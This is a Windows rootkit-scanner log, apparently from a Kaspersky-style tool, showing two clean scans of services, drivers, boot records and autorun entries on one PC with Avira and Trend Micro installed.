14:17:54.0648 0x1220  TeamViewer - ok
14:17:54.0658 0x1220  TermDD - ok
14:17:54.0658 0x1220  TermService - ok
14:17:54.0668 0x1220  Themes - ok
14:17:54.0668 0x1220  THREADORDER - ok
14:17:54.0678 0x1220  tmactmon - ok
14:17:54.0688 0x1220  tmcomm - ok
14:17:54.0688 0x1220  TMEBC - ok
14:17:54.0698 0x1220  tmeevw - ok
14:17:54.0698 0x1220  tmevtmgr - ok
14:17:54.0708 0x1220  tmnciesc - ok
14:17:54.0708 0x1220  tmusa - ok
14:17:54.0718 0x1220  TrkWks - ok
14:17:54.0718 0x1220  truecrypt - ok
14:17:54.0728 0x1220  TrustedInstaller - ok
14:17:54.0738 0x1220  tssecsrv - ok
14:17:54.0738 0x1220  TsUsbFlt - ok
14:17:54.0738 0x1220  TsUsbGD - ok
14:17:54.0748 0x1220  tunnel - ok
14:17:54.0748 0x1220  uagp35 - ok
14:17:54.0758 0x1220  udfs - ok
14:17:54.0768 0x1220  UI0Detect - ok
14:17:54.0768 0x1220  uliagpkx - ok
14:17:54.0778 0x1220  umbus - ok
14:17:54.0778 0x1220  UmPass - ok
14:17:54.0788 0x1220  upnphost - ok
14:17:54.0788 0x1220  USBAAPL - ok
14:17:54.0798 0x1220  usbccgp - ok
14:17:54.0798 0x1220  usbcir - ok
14:17:54.0808 0x1220  usbehci - ok
14:17:54.0808 0x1220  usbhub - ok
14:17:54.0818 0x1220  usbohci - ok
14:17:54.0818 0x1220  usbprint - ok
14:17:54.0828 0x1220  usbser - ok
14:17:54.0828 0x1220  USBSTOR - ok
14:17:54.0838 0x1220  usbuhci - ok
14:17:54.0838 0x1220  UxSms - ok
14:17:54.0848 0x1220  VaultSvc - ok
14:17:54.0848 0x1220  vdrvroot - ok
14:17:54.0858 0x1220  vds - ok
14:17:54.0858 0x1220  vga - ok
14:17:54.0868 0x1220  VgaSave - ok
14:17:54.0868 0x1220  vhdmp - ok
14:17:54.0878 0x1220  viaagp - ok
14:17:54.0878 0x1220  ViaC7 - ok
14:17:54.0888 0x1220  viaide - ok
14:17:54.0888 0x1220  volmgr - ok
14:17:54.0898 0x1220  volmgrx - ok
14:17:54.0898 0x1220  volsnap - ok
14:17:54.0908 0x1220  vsmraid - ok
14:17:54.0908 0x1220  VSS - ok
14:17:54.0918 0x1220  vwifibus - ok
14:17:54.0928 0x1220  W32Time - ok
14:17:54.0928 0x1220  WacomPen - ok
14:17:54.0938 0x1220  WANARP - ok
14:17:54.0938 0x1220  Wanarpv6 - ok
14:17:54.0948 0x1220  wbengine - ok
14:17:54.0948 0x1220  WbioSrvc - ok
14:17:54.0958 0x1220  wcncsvc - ok
14:17:54.0958 0x1220  WcsPlugInService - ok
14:17:54.0968 0x1220  Wd - ok
14:17:54.0968 0x1220  Wdf01000 - ok
14:17:54.0978 0x1220  WdiServiceHost - ok
14:17:54.0978 0x1220  WdiSystemHost - ok
14:17:54.0988 0x1220  WebClient - ok
14:17:54.0988 0x1220  Wecsvc - ok
14:17:54.0998 0x1220  wercplsupport - ok
14:17:54.0998 0x1220  WerSvc - ok
14:17:55.0008 0x1220  WfpLwf - ok
14:17:55.0008 0x1220  WIMMount - ok
14:17:55.0018 0x1220  WinDefend - ok
14:17:55.0028 0x1220  WinHttpAutoProxySvc - ok
14:17:55.0028 0x1220  Winmgmt - ok
14:17:55.0038 0x1220  WinRM - ok
14:17:55.0038 0x1220  WinUsb - ok
14:17:55.0048 0x1220  Wlansvc - ok
14:17:55.0058 0x1220  WmiAcpi - ok
14:17:55.0058 0x1220  wmiApSrv - ok
14:17:55.0068 0x1220  WMPNetworkSvc - ok
14:17:55.0068 0x1220  WPCSvc - ok
14:17:55.0078 0x1220  WPDBusEnum - ok
14:17:55.0078 0x1220  ws2ifsl - ok
14:17:55.0088 0x1220  wscsvc - ok
14:17:55.0088 0x1220  WSearch - ok
14:17:55.0098 0x1220  wuauserv - ok
14:17:55.0108 0x1220  WudfPf - ok
14:17:55.0108 0x1220  WUDFRd - ok
14:17:55.0108 0x1220  wudfsvc - ok
14:17:55.0118 0x1220  WwanSvc - ok
14:17:55.0128 0x1220  ================ Scan global ===============================
14:17:55.0128 0x1220  [ Global ] - ok
14:17:55.0128 0x1220  ================ Scan MBR ==================================
14:17:55.0128 0x1220  [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0
14:17:55.0148 0x1220  \Device\Harddisk0\DR0 - ok
14:17:55.0188 0x1220  [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1
14:17:55.0228 0x1220  \Device\Harddisk1\DR1 - ok
14:17:55.0228 0x1220  ================ Scan VBR ==================================
14:17:55.0238 0x1220  [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1
14:17:55.0238 0x1220  \Device\Harddisk0\DR0\Partition1 - ok
14:17:55.0238 0x1220  [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2
14:17:55.0238 0x1220  \Device\Harddisk0\DR0\Partition2 - ok
14:17:55.0238 0x1220  [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1
14:17:55.0248 0x1220  \Device\Harddisk1\DR1\Partition1 - ok
14:17:55.0248 0x1220  ================ Scan generic autorun ======================
14:17:55.0248 0x1220  RtHDVCpl - ok
14:17:55.0248 0x1220  Skytel - ok
14:17:55.0248 0x1220  PCMService - ok
14:17:55.0248 0x1220  CanonMyPrinter - ok
14:17:55.0258 0x1220  NvBackend - ok
14:17:55.0258 0x1220  Trend Micro Client Framework - ok
14:17:55.0258 0x1220  Platinum - ok
14:17:55.0258 0x1220  avgnt - ok
14:17:55.0268 0x1220  Avira Systray - ok
14:17:55.0268 0x1220  Sidebar - ok
14:17:55.0268 0x1220  mctadmin - ok
14:17:55.0268 0x1220  Sidebar - ok
14:17:55.0268 0x1220  mctadmin - ok
14:17:55.0278 0x1220  IncrediMail - ok
14:17:55.0338 0x1220  AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated )
14:17:55.0338 0x1220  AV detected via SS2: Trend Micro Internet Security, C:\Program Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated )
14:17:55.0348 0x1220  Win FW state via NFP2: enabled
14:17:57.0799 0x1220  ============================================================
14:17:57.0799 0x1220  Scan finished
14:17:57.0799 0x1220  ============================================================
14:17:57.0799 0x1ad8  Detected object count: 0
14:17:57.0799 0x1ad8  Actual detected object count: 0
14:21:19.0727 0x1464  ============================================================
14:21:19.0727 0x1464  Scan started
14:21:19.0727 0x1464  Mode: Manual; SigCheck; TDLFS; 
14:21:19.0727 0x1464  ============================================================
14:21:19.0727 0x1464  KSN ping started
14:21:33.0068 0x1464  KSN ping finished: true
14:21:33.0228 0x1464  ================ Scan system memory ========================
14:21:33.0228 0x1464  System memory - ok
14:21:33.0228 0x1464  ================ Scan services =============================
14:21:33.0248 0x1464  1394ohci - ok
14:21:33.0248 0x1464  ACPI - ok
14:21:33.0258 0x1464  AcpiPmi - ok
14:21:33.0258 0x1464  Adobe LM Service - ok
14:21:33.0268 0x1464  AdobeARMservice - ok
14:21:33.0268 0x1464  AdobeFlashPlayerUpdateSvc - ok
14:21:33.0278 0x1464  adp94xx - ok
14:21:33.0278 0x1464  adpahci - ok
14:21:33.0288 0x1464  adpu320 - ok
14:21:33.0288 0x1464  AeLookupSvc - ok
14:21:33.0298 0x1464  AFD - ok
14:21:33.0298 0x1464  agp440 - ok
14:21:33.0308 0x1464  aic78xx - ok
14:21:33.0308 0x1464  ALG - ok
14:21:33.0318 0x1464  aliide - ok
14:21:33.0318 0x1464  amdagp - ok
14:21:33.0328 0x1464  amdide - ok
14:21:33.0328 0x1464  AmdK8 - ok
14:21:33.0338 0x1464  AmdPPM - ok
14:21:33.0338 0x1464  amdsata - ok
14:21:33.0348 0x1464  amdsbs - ok
14:21:33.0348 0x1464  amdxata - ok
14:21:33.0358 0x1464  Amsp - ok
14:21:33.0358 0x1464  AntiVirSchedulerService - ok
14:21:33.0368 0x1464  AntiVirService - ok
14:21:33.0368 0x1464  AppID - ok
14:21:33.0378 0x1464  AppIDSvc - ok
14:21:33.0378 0x1464  Appinfo - ok
14:21:33.0388 0x1464  Apple Mobile Device - ok
14:21:33.0388 0x1464  arc - ok
14:21:33.0398 0x1464  arcsas - ok
14:21:33.0408 0x1464  aspnet_state - ok
14:21:33.0408 0x1464  AsyncMac - ok
14:21:33.0418 0x1464  atapi - ok
14:21:33.0418 0x1464  AudioEndpointBuilder - ok
14:21:33.0428 0x1464  Audiosrv - ok
14:21:33.0428 0x1464  avgntflt - ok
14:21:33.0438 0x1464  avipbb - ok
14:21:33.0438 0x1464  Avira.OE.ServiceHost - ok
14:21:33.0448 0x1464  avkmgr - ok
14:21:33.0448 0x1464  AxInstSV - ok
14:21:33.0458 0x1464  b06bdrv - ok
14:21:33.0458 0x1464  b57nd60x - ok
14:21:33.0468 0x1464  BDESVC - ok
14:21:33.0468 0x1464  Beep - ok
14:21:33.0478 0x1464  BFE - ok
14:21:33.0478 0x1464  BITS - ok
14:21:33.0488 0x1464  blbdrive - ok
14:21:33.0488 0x1464  Bonjour Service - ok
14:21:33.0498 0x1464  bowser - ok
14:21:33.0498 0x1464  BrFiltLo - ok
14:21:33.0508 0x1464  BrFiltUp - ok
14:21:33.0508 0x1464  Browser - ok
14:21:33.0518 0x1464  Brserid - ok
14:21:33.0518 0x1464  BrSerWdm - ok
14:21:33.0528 0x1464  BrUsbMdm - ok
14:21:33.0528 0x1464  BrUsbSer - ok
14:21:33.0538 0x1464  BTHMODEM - ok
14:21:33.0538 0x1464  bthserv - ok
14:21:33.0548 0x1464  cdfs - ok
14:21:33.0548 0x1464  cdrom - ok
14:21:33.0558 0x1464  CertPropSvc - ok
14:21:33.0558 0x1464  circlass - ok
14:21:33.0568 0x1464  CLCapSvc - ok
14:21:33.0568 0x1464  CLFS - ok
14:21:33.0578 0x1464  clr_optimization_v2.0.50727_32 - ok
14:21:33.0578 0x1464  clr_optimization_v4.0.30319_32 - ok
14:21:33.0588 0x1464  CLSched - ok
14:21:33.0588 0x1464  CmBatt - ok
14:21:33.0598 0x1464  cmdide - ok
14:21:33.0598 0x1464  CNG - ok
14:21:33.0608 0x1464  Compbatt - ok
14:21:33.0608 0x1464  CompositeBus - ok
14:21:33.0618 0x1464  COMSysApp - ok
14:21:33.0628 0x1464  crcdisk - ok
14:21:33.0628 0x1464  CryptSvc - ok
14:21:33.0638 0x1464  CXAVSAUD - ok
14:21:33.0638 0x1464  DcomLaunch - ok
14:21:33.0648 0x1464  defragsvc - ok
14:21:33.0648 0x1464  DfsC - ok
14:21:33.0658 0x1464  Dhcp - ok
14:21:33.0658 0x1464  discache - ok
14:21:33.0668 0x1464  Disk - ok
14:21:33.0668 0x1464  Dnscache - ok
14:21:33.0678 0x1464  dot3svc - ok
14:21:33.0678 0x1464  DPS - ok
14:21:33.0688 0x1464  drmkaud - ok
14:21:33.0688 0x1464  DXGKrnl - ok
14:21:33.0698 0x1464  EapHost - ok
14:21:33.0698 0x1464  ebdrv - ok
14:21:33.0708 0x1464  EFS - ok
14:21:33.0708 0x1464  ehRecvr - ok
14:21:33.0718 0x1464  ehSched - ok
14:21:33.0718 0x1464  elxstor - ok
14:21:33.0728 0x1464  ErrDev - ok
14:21:33.0738 0x1464  EventSystem - ok
14:21:33.0738 0x1464  exfat - ok
14:21:33.0748 0x1464  fastfat - ok
14:21:33.0748 0x1464  Fax - ok
14:21:33.0758 0x1464  fdc - ok
14:21:33.0758 0x1464  fdPHost - ok
14:21:33.0768 0x1464  FDResPub - ok
14:21:33.0768 0x1464  FileInfo - ok
14:21:33.0778 0x1464  Filetrace - ok
14:21:33.0778 0x1464  flpydisk - ok
14:21:33.0778 0x1464  FltMgr - ok
14:21:33.0788 0x1464  FontCache - ok
14:21:33.0798 0x1464  FontCache3.0.0.0 - ok
14:21:33.0798 0x1464  FsDepends - ok
14:21:33.0808 0x1464  Fs_Rec - ok
14:21:33.0808 0x1464  fvevol - ok
14:21:33.0818 0x1464  gagp30kx - ok
14:21:33.0818 0x1464  GEARAspiWDM - ok
14:21:33.0828 0x1464  gpsvc - ok
14:21:33.0828 0x1464  gupdate - ok
14:21:33.0838 0x1464  gupdatem - ok
14:21:33.0838 0x1464  HauppaugeTVServer - ok
14:21:33.0848 0x1464  hcw85cir - ok
14:21:33.0848 0x1464  hcw88bda - ok
14:21:33.0858 0x1464  hcw88rc5 - ok
14:21:33.0858 0x1464  HCW88TSE - ok
14:21:33.0868 0x1464  hcw88vid - ok
14:21:33.0868 0x1464  HdAudAddService - ok
14:21:33.0878 0x1464  HDAudBus - ok
14:21:33.0878 0x1464  HidBatt - ok
14:21:33.0888 0x1464  HidBth - ok
14:21:33.0888 0x1464  HidIr - ok
14:21:33.0898 0x1464  hidserv - ok
14:21:33.0898 0x1464  HidUsb - ok
14:21:33.0908 0x1464  hkmsvc - ok
14:21:33.0908 0x1464  HomeGroupListener - ok
14:21:33.0918 0x1464  HomeGroupProvider - ok
14:21:33.0918 0x1464  HpSAMD - ok
14:21:33.0928 0x1464  HTTP - ok
14:21:33.0928 0x1464  hwpolicy - ok
14:21:33.0938 0x1464  i8042prt - ok
14:21:33.0938 0x1464  iaStorV - ok
14:21:33.0948 0x1464  idsvc - ok
14:21:33.0948 0x1464  IEEtwCollectorService - ok
14:21:33.0958 0x1464  iirsp - ok
14:21:33.0958 0x1464  IKEEXT - ok
14:21:33.0968 0x1464  IntcAzAudAddService - ok
14:21:33.0978 0x1464  intelide - ok
14:21:33.0978 0x1464  intelppm - ok
14:21:33.0978 0x1464  IPBusEnum - ok
14:21:33.0988 0x1464  IpFilterDriver - ok
14:21:33.0988 0x1464  iphlpsvc - ok
14:21:33.0998 0x1464  IPMIDRV - ok
14:21:33.0998 0x1464  IPNAT - ok
14:21:34.0008 0x1464  iPod Service - ok
14:21:34.0008 0x1464  IRENUM - ok
14:21:34.0018 0x1464  isapnp - ok
14:21:34.0018 0x1464  iScsiPrt - ok
14:21:34.0028 0x1464  kbdclass - ok
14:21:34.0028 0x1464  kbdhid - ok
14:21:34.0038 0x1464  KeyIso - ok
14:21:34.0048 0x1464  KSecDD - ok
14:21:34.0048 0x1464  KSecPkg - ok
14:21:34.0058 0x1464  KtmRm - ok
14:21:34.0058 0x1464  L1E - ok
14:21:34.0068 0x1464  LanmanServer - ok
14:21:34.0068 0x1464  LanmanWorkstation - ok
14:21:34.0078 0x1464  lltdio - ok
14:21:34.0078 0x1464  lltdsvc - ok
14:21:34.0088 0x1464  lmhosts - ok
14:21:34.0098 0x1464  LSI_FC - ok
14:21:34.0098 0x1464  LSI_SAS - ok
14:21:34.0098 0x1464  LSI_SAS2 - ok
14:21:34.0108 0x1464  LSI_SCSI - ok
14:21:34.0108 0x1464  luafv - ok
14:21:34.0118 0x1464  MBAMProtector - ok
14:21:34.0118 0x1464  MBAMScheduler - ok
14:21:34.0128 0x1464  MBAMService - ok
14:21:34.0128 0x1464  MBAMSwissArmy - ok
14:21:34.0138 0x1464  MBAMWebAccessControl - ok
14:21:34.0138 0x1464  Mcx2Svc - ok
14:21:34.0148 0x1464  megasas - ok
14:21:34.0148 0x1464  MegaSR - ok
14:21:34.0158 0x1464  MMCSS - ok
14:21:34.0158 0x1464  Modem - ok
14:21:34.0168 0x1464  monitor - ok
14:21:34.0168 0x1464  mouclass - ok
14:21:34.0178 0x1464  mouhid - ok
14:21:34.0178 0x1464  mountmgr - ok
14:21:34.0188 0x1464  MozillaMaintenance - ok
14:21:34.0188 0x1464  mpio - ok
14:21:34.0198 0x1464  mpsdrv - ok
14:21:34.0198 0x1464  MpsSvc - ok
14:21:34.0208 0x1464  MRxDAV - ok
14:21:34.0208 0x1464  mrxsmb - ok
14:21:34.0218 0x1464  mrxsmb10 - ok
14:21:34.0218 0x1464  mrxsmb20 - ok
14:21:34.0228 0x1464  msahci - ok
14:21:34.0228 0x1464  msdsm - ok
14:21:34.0238 0x1464  MSDTC - ok
14:21:34.0248 0x1464  Msfs - ok
14:21:34.0248 0x1464  mshidkmdf - ok
14:21:34.0258 0x1464  msisadrv - ok
14:21:34.0258 0x1464  MSiSCSI - ok
14:21:34.0268 0x1464  msiserver - ok
14:21:34.0268 0x1464  MSKSSRV - ok
14:21:34.0278 0x1464  MSPCLOCK - ok
14:21:34.0278 0x1464  MSPQM - ok
14:21:34.0288 0x1464  MsRPC - ok
14:21:34.0298 0x1464  mssmbios - ok
14:21:34.0298 0x1464  MSTEE - ok
14:21:34.0298 0x1464  MTConfig - ok
14:21:34.0308 0x1464  MTsensor - ok
14:21:34.0308 0x1464  Mup - ok
14:21:34.0318 0x1464  napagent - ok
14:21:34.0318 0x1464  NativeWifiP - ok
14:21:34.0328 0x1464  NDIS - ok
14:21:34.0328 0x1464  NdisCap - ok
14:21:34.0338 0x1464  NdisTapi - ok
14:21:34.0338 0x1464  Ndisuio - ok
14:21:34.0348 0x1464  NdisWan - ok
14:21:34.0348 0x1464  NDProxy - ok
14:21:34.0358 0x1464  NetBIOS - ok
14:21:34.0358 0x1464  NetBT - ok
14:21:34.0368 0x1464  Netlogon - ok
14:21:34.0368 0x1464  Netman - ok
14:21:34.0378 0x1464  NetMsmqActivator - ok
14:21:34.0378 0x1464  NetPipeActivator - ok
14:21:34.0388 0x1464  netprofm - ok
14:21:34.0388 0x1464  NetTcpActivator - ok
14:21:34.0398 0x1464  NetTcpPortSharing - ok
14:21:34.0398 0x1464  nfrd960 - ok
14:21:34.0408 0x1464  NlaSvc - ok
14:21:34.0408 0x1464  NPF - ok
14:21:34.0418 0x1464  Npfs - ok
14:21:34.0418 0x1464  nsi - ok
14:21:34.0428 0x1464  nsiproxy - ok
14:21:34.0438 0x1464  Ntfs - ok
14:21:34.0438 0x1464  Null - ok
14:21:34.0438 0x1464  nvlddmkm - ok
14:21:34.0448 0x1464  nvraid - ok
14:21:34.0448 0x1464  nvstor - ok
14:21:34.0458 0x1464  nvsvc - ok
14:21:34.0458 0x1464  nv_agp - ok
14:21:34.0468 0x1464  ohci1394 - ok
14:21:34.0468 0x1464  ose - ok
14:21:34.0478 0x1464  p2pimsvc - ok
14:21:34.0478 0x1464  p2psvc - ok
14:21:34.0488 0x1464  Parport - ok
14:21:34.0488 0x1464  partmgr - ok
14:21:34.0498 0x1464  Parvdm - ok
14:21:34.0498 0x1464  PcaSvc - ok
14:21:34.0508 0x1464  pci - ok
14:21:34.0508 0x1464  pciide - ok
14:21:34.0518 0x1464  pcmcia - ok
14:21:34.0518 0x1464  pcw - ok
14:21:34.0528 0x1464  PDF Architect 2 Creator - ok
14:21:34.0528 0x1464  PEAUTH - ok
14:21:34.0548 0x1464  PGPdisk - ok
14:21:34.0548 0x1464  pgpfs - ok
14:21:34.0558 0x1464  PGPsdkDriver - ok
14:21:34.0558 0x1464  PGPserv - ok
14:21:34.0568 0x1464  PGPwded - ok
14:21:34.0568 0x1464  Pgpwdefs - ok
14:21:34.0578 0x1464  pla - ok
14:21:34.0578 0x1464  Platinum Host Service - ok
14:21:34.0588 0x1464  PlugPlay - ok
14:21:34.0588 0x1464  PNRPAutoReg - ok
14:21:34.0598 0x1464  PNRPsvc - ok
14:21:34.0598 0x1464  PolicyAgent - ok
14:21:34.0608 0x1464  Power - ok
14:21:34.0618 0x1464  PptpMiniport - ok
14:21:34.0618 0x1464  Processor - ok
14:21:34.0628 0x1464  ProfSvc - ok
14:21:34.0628 0x1464  ProtectedStorage - ok
14:21:34.0628 0x1464  Psched - ok
14:21:34.0638 0x1464  ql2300 - ok
14:21:34.0638 0x1464  ql40xx - ok
14:21:34.0648 0x1464  QWAVE - ok
14:21:34.0648 0x1464  QWAVEdrv - ok
14:21:34.0658 0x1464  RasAcd - ok
14:21:34.0658 0x1464  RasAgileVpn - ok
14:21:34.0668 0x1464  RasAuto - ok
14:21:34.0668 0x1464  Rasl2tp - ok
14:21:34.0678 0x1464  RasMan - ok
14:21:34.0678 0x1464  RasPppoe - ok
14:21:34.0688 0x1464  RasSstp - ok
14:21:34.0688 0x1464  rdbss - ok
14:21:34.0698 0x1464  rdpbus - ok
14:21:34.0698 0x1464  RDPCDD - ok
14:21:34.0708 0x1464  RDPENCDD - ok
14:21:34.0718 0x1464  RDPREFMP - ok
14:21:34.0728 0x1464  RdpVideoMiniport - ok
14:21:34.0728 0x1464  RDPWD - ok
14:21:34.0728 0x1464  rdyboost - ok
14:21:34.0738 0x1464  RemoteAccess - ok
14:21:34.0738 0x1464  RemoteRegistry - ok
14:21:34.0748 0x1464  RichVideo - ok
14:21:34.0748 0x1464  rpcapd - ok
14:21:34.0758 0x1464  RpcEptMapper - ok
14:21:34.0758 0x1464  RpcLocator - ok
14:21:34.0768 0x1464  RpcSs - ok
14:21:34.0768 0x1464  rspndr - ok
14:21:34.0778 0x1464  SamSs - ok
14:21:34.0778 0x1464  sbp2port - ok
14:21:34.0788 0x1464  SCardSvr - ok
14:21:34.0788 0x1464  scfilter - ok
14:21:34.0798 0x1464  Schedule - ok
14:21:34.0798 0x1464  SCPolicySvc - ok
14:21:34.0808 0x1464  SDRSVC - ok
14:21:34.0808 0x1464  secdrv - ok
14:21:34.0818 0x1464  seclogon - ok
14:21:34.0818 0x1464  SENS - ok
14:21:34.0828 0x1464  SensrSvc - ok
14:21:34.0828 0x1464  Serenum - ok
14:21:34.0838 0x1464  Serial - ok
14:21:34.0838 0x1464  sermouse - ok
14:21:34.0848 0x1464  SessionEnv - ok
14:21:34.0858 0x1464  sffdisk - ok
14:21:34.0858 0x1464  sffp_mmc - ok
14:21:34.0868 0x1464  sffp_sd - ok
14:21:34.0868 0x1464  sfloppy - ok
14:21:34.0878 0x1464  SharedAccess - ok
14:21:34.0878 0x1464  ShellHWDetection - ok
14:21:34.0888 0x1464  sisagp - ok
14:21:34.0888 0x1464  SiSRaid2 - ok
14:21:34.0898 0x1464  SiSRaid4 - ok
14:21:34.0898 0x1464  Smb - ok
14:21:34.0908 0x1464  SNMPTRAP - ok
14:21:34.0918 0x1464  spldr - ok
14:21:34.0918 0x1464  Spooler - ok
14:21:34.0928 0x1464  sppsvc - ok
14:21:34.0928 0x1464  sppuinotify - ok
14:21:34.0938 0x1464  srv - ok
14:21:34.0938 0x1464  srv2 - ok
14:21:34.0948 0x1464  srvnet - ok
14:21:34.0948 0x1464  SSDPSRV - ok
14:21:34.0958 0x1464  ssmdrv - ok
14:21:34.0958 0x1464  SstpSvc - ok
14:21:34.0968 0x1464  Stereo Service - ok
14:21:34.0968 0x1464  stexstor - ok
14:21:34.0978 0x1464  StillCam - ok
14:21:34.0978 0x1464  StiSvc - ok
14:21:34.0978 0x1464  swenum - ok
14:21:34.0988 0x1464  swprv - ok
14:21:34.0988 0x1464  SysMain - ok
14:21:34.0998 0x1464  TabletInputService - ok
14:21:34.0998 0x1464  TapiSrv - ok
14:21:35.0008 0x1464  TBS - ok
14:21:35.0008 0x1464  Tcpip - ok
14:21:35.0018 0x1464  TCPIP6 - ok
14:21:35.0028 0x1464  tcpipreg - ok
14:21:35.0028 0x1464  TDPIPE - ok
14:21:35.0038 0x1464  TDTCP - ok
14:21:35.0038 0x1464  tdx - ok
14:21:35.0048 0x1464  TeamViewer - ok
14:21:35.0048 0x1464  TermDD - ok
14:21:35.0058 0x1464  TermService - ok
14:21:35.0058 0x1464  Themes - ok
14:21:35.0068 0x1464  THREADORDER - ok
14:21:35.0068 0x1464  tmactmon - ok
14:21:35.0078 0x1464  tmcomm - ok
14:21:35.0088 0x1464  TMEBC - ok
14:21:35.0088 0x1464  tmeevw - ok
14:21:35.0088 0x1464  tmevtmgr - ok
14:21:35.0098 0x1464  tmnciesc - ok
14:21:35.0098 0x1464  tmusa - ok
14:21:35.0108 0x1464  TrkWks - ok
14:21:35.0108 0x1464  truecrypt - ok
14:21:35.0118 0x1464  TrustedInstaller - ok
14:21:35.0128 0x1464  tssecsrv - ok
14:21:35.0128 0x1464  TsUsbFlt - ok
14:21:35.0138 0x1464  TsUsbGD - ok
14:21:35.0138 0x1464  tunnel - ok
14:21:35.0148 0x1464  uagp35 - ok
14:21:35.0148 0x1464  udfs - ok
14:21:35.0158 0x1464  UI0Detect - ok
14:21:35.0168 0x1464  uliagpkx - ok
14:21:35.0168 0x1464  umbus - ok
14:21:35.0178 0x1464  UmPass - ok
14:21:35.0178 0x1464  upnphost - ok
14:21:35.0188 0x1464  USBAAPL - ok
14:21:35.0188 0x1464  usbccgp - ok
14:21:35.0198 0x1464  usbcir - ok
14:21:35.0198 0x1464  usbehci - ok
14:21:35.0198 0x1464  usbhub - ok
14:21:35.0208 0x1464  usbohci - ok
14:21:35.0218 0x1464  usbprint - ok
14:21:35.0218 0x1464  usbser - ok
14:21:35.0218 0x1464  USBSTOR - ok
14:21:35.0228 0x1464  usbuhci - ok
14:21:35.0228 0x1464  UxSms - ok
14:21:35.0238 0x1464  VaultSvc - ok
14:21:35.0238 0x1464  vdrvroot - ok
14:21:35.0248 0x1464  vds - ok
14:21:35.0248 0x1464  vga - ok
14:21:35.0258 0x1464  VgaSave - ok
14:21:35.0258 0x1464  vhdmp - ok
14:21:35.0268 0x1464  viaagp - ok
14:21:35.0268 0x1464  ViaC7 - ok
14:21:35.0278 0x1464  viaide - ok
14:21:35.0278 0x1464  volmgr - ok
14:21:35.0288 0x1464  volmgrx - ok
14:21:35.0288 0x1464  volsnap - ok
14:21:35.0298 0x1464  vsmraid - ok
14:21:35.0298 0x1464  VSS - ok
14:21:35.0308 0x1464  vwifibus - ok
14:21:35.0308 0x1464  W32Time - ok
14:21:35.0318 0x1464  WacomPen - ok
14:21:35.0328 0x1464  WANARP - ok
14:21:35.0328 0x1464  Wanarpv6 - ok
14:21:35.0338 0x1464  wbengine - ok
14:21:35.0338 0x1464  WbioSrvc - ok
14:21:35.0348 0x1464  wcncsvc - ok
14:21:35.0348 0x1464  WcsPlugInService - ok
14:21:35.0358 0x1464  Wd - ok
14:21:35.0358 0x1464  Wdf01000 - ok
14:21:35.0368 0x1464  WdiServiceHost - ok
14:21:35.0368 0x1464  WdiSystemHost - ok
14:21:35.0368 0x1464  WebClient - ok
14:21:35.0378 0x1464  Wecsvc - ok
14:21:35.0378 0x1464  wercplsupport - ok
14:21:35.0388 0x1464  WerSvc - ok
14:21:35.0388 0x1464  WfpLwf - ok
14:21:35.0398 0x1464  WIMMount - ok
14:21:35.0398 0x1464  WinDefend - ok
14:21:35.0408 0x1464  WinHttpAutoProxySvc - ok
14:21:35.0418 0x1464  Winmgmt - ok
14:21:35.0418 0x1464  WinRM - ok
14:21:35.0428 0x1464  WinUsb - ok
14:21:35.0438 0x1464  Wlansvc - ok
14:21:35.0438 0x1464  WmiAcpi - ok
14:21:35.0448 0x1464  wmiApSrv - ok
14:21:35.0448 0x1464  WMPNetworkSvc - ok
14:21:35.0458 0x1464  WPCSvc - ok
14:21:35.0458 0x1464  WPDBusEnum - ok
14:21:35.0468 0x1464  ws2ifsl - ok
14:21:35.0468 0x1464  wscsvc - ok
14:21:35.0478 0x1464  WSearch - ok
14:21:35.0478 0x1464  wuauserv - ok
14:21:35.0488 0x1464  WudfPf - ok
14:21:35.0488 0x1464  WUDFRd - ok
14:21:35.0498 0x1464  wudfsvc - ok
14:21:35.0498 0x1464  WwanSvc - ok
14:21:35.0508 0x1464  ================ Scan global ===============================
14:21:35.0508 0x1464  [ Global ] - ok
14:21:35.0508 0x1464  ================ Scan MBR ==================================
14:21:35.0518 0x1464  [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0
14:21:35.0548 0x1464  \Device\Harddisk0\DR0 - ok
14:21:35.0548 0x1464  [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1
14:21:35.0648 0x1464  \Device\Harddisk1\DR1 - ok
14:21:35.0648 0x1464  ================ Scan VBR ==================================
14:21:35.0648 0x1464  [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1
14:21:35.0648 0x1464  \Device\Harddisk0\DR0\Partition1 - ok
14:21:35.0658 0x1464  [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2
14:21:35.0658 0x1464  \Device\Harddisk0\DR0\Partition2 - ok
14:21:35.0658 0x1464  [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1
14:21:35.0658 0x1464  \Device\Harddisk1\DR1\Partition1 - ok
14:21:35.0668 0x1464  ================ Scan generic autorun ======================
14:21:35.0668 0x1464  RtHDVCpl - ok
14:21:35.0668 0x1464  Skytel - ok
14:21:35.0668 0x1464  PCMService - ok
14:21:35.0668 0x1464  CanonMyPrinter - ok
14:21:35.0678 0x1464  NvBackend - ok
14:21:35.0678 0x1464  Trend Micro Client Framework - ok
14:21:35.0678 0x1464  Platinum - ok
14:21:35.0678 0x1464  avgnt - ok
14:21:35.0678 0x1464  Avira Systray - ok
14:21:35.0688 0x1464  Sidebar - ok
14:21:35.0688 0x1464  mctadmin - ok
14:21:35.0688 0x1464  Sidebar - ok
14:21:35.0688 0x1464  mctadmin - ok
14:21:35.0698 0x1464  IncrediMail - ok
14:21:35.0708 0x1464  AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated )
14:21:35.0708 0x1464  AV detected via SS2: Trend Micro Internet Security, C:\Program Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated )
